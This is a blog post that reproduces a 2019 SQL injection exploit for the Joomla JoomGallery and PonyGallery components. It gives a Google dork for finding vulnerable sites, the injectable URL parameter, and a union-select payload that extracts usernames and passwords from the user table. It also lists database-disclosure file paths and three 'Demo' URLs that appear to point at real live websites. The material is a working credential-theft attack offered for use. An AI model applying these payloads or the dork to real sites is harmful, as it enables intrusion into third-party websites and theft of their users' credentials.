Latest Tweets

Joomla SQLI DORK #2 ON 2019

# Exploit Title: [Joomla JoomGallery 3.2.2 PonyGallery 2.5.1 SQL Injection ] # Google Dork: inurl:''/index.php?option=com_ponygallery'' # Date: 2/13/2019 # Exploit Author: Nullix Security Team | NikbinHK | Mohammad Nikbin # Vendor Homepage: joomlander.net - joomlacode.org # Software Link: github.com/JoomGallery/JoomGallery/archive/master.zip # Version: 3.3.0 3.2.2 for Joomla 3.x and previous versions. # Tested on: win,linux ###################################################################################### # Exploit : ********************** /index.php?option=com_ponygallery&Itemid=[SQL Injection] /index.php?option=com_ponygallery&Itemid=[SQL Injection] /index.php?option=com_ponygallery&Itemid=[SQL Injection]&func=special # Example Payload : ************************************* %20union%20select%201,2,3,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),5,0,0%20from%20jos_users/* # Database Disclosure Exploit : *************************** /administrator/components/com_joomgallery/sql/install.mysql.utf8.sql /administrator/components/com_joomgallery/sql/uninstall.mysql.utf8.sql # Exploit /administrator/components/com_joomgallery/sql/updates/mysql/[Version].sql version : (2.0.0 , 2.0.0 , 2.1.0 , 3.0.0 , 3.1.0 , 3.2.0 , 3.2.1, 3.3.0 ) for Example : /administrator/components/com_joomgallery/sql/updates/mysql/2.0.0.sql #################################################################### [+] Demo : skhssco.org.mo/index.php?option=com_joomgallery&func=viewcategory&catid=113&startpage=1&substartpage=3&Itemid=5%27&lang=en [+] Demo : okokratt.ee/gamezone/index.php?option=com_joomgallery&func=viewcategory&catid=7&startpage=1&substartpage=1&Itemid=44%27&lang=en [+] Demo : cimbria.net/joomla/index.php?option=com_ponygallery&Itemid=38%27
Previous
Next Post »
'; (function() { var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true; dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js'; (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq); })();